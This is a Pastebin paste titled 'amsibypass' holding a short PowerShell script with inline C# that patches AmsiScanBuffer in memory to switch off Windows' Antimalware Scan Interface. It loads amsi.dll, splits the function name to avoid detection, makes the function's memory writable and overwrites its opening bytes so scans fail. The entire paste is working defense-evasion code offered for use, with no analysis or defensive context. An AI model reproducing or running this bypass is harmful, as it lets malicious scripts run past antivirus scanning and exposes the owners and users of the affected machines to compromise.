Advertisement
hollerith

amsibypass

Jan 23rd, 2021
315
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. $Ref = (
  2. "System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
  3. "System.Runtime.InteropServices, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a"
  4. )
  5.  
  6. $Source = @"
  7. using System;
  8. using System.Runtime.InteropServices;
  9.  
  10. namespace Bypass
  11. {
  12. public class AMSI
  13. {
  14. [DllImport("kernel32")]
  15. public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
  16. [DllImport("kernel32")]
  17. public static extern IntPtr LoadLibrary(string name);
  18. [DllImport("kernel32")]
  19. public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect);
  20.  
  21. [DllImport("Kernel32.dll", EntryPoint = "RtlMoveMemory", SetLastError = false)]
  22. static extern void MoveMemory(IntPtr dest, IntPtr src, int size);
  23.  
  24. public static int Disable()
  25. {
  26. IntPtr TargetDLL = LoadLibrary("amsi.dll");
  27. if (TargetDLL == IntPtr.Zero) { return 1; }
  28.  
  29. IntPtr ASBPtr = GetProcAddress(TargetDLL, "Amsi" + "Scan" + "Buffer");
  30. if (ASBPtr == IntPtr.Zero) { return 1; }
  31.  
  32. UIntPtr dwSize = (UIntPtr)5;
  33. uint Zero = 0;
  34.  
  35. if (!VirtualProtect(ASBPtr, dwSize, 0x40, out Zero)) { return 1; }
  36.  
  37. Byte[] Patch = { 0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3 };
  38. IntPtr unmanagedPointer = Marshal.AllocHGlobal(6);
  39. Marshal.Copy(Patch, 0, unmanagedPointer, 6);
  40. MoveMemory(ASBPtr, unmanagedPointer, 6);
  41.  
  42. return 0;
  43. }
  44. }
  45. }
  46. "@
  47.  
  48. Add-Type -ReferencedAssemblies $Ref -TypeDefinition $Source -Language CSharp
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement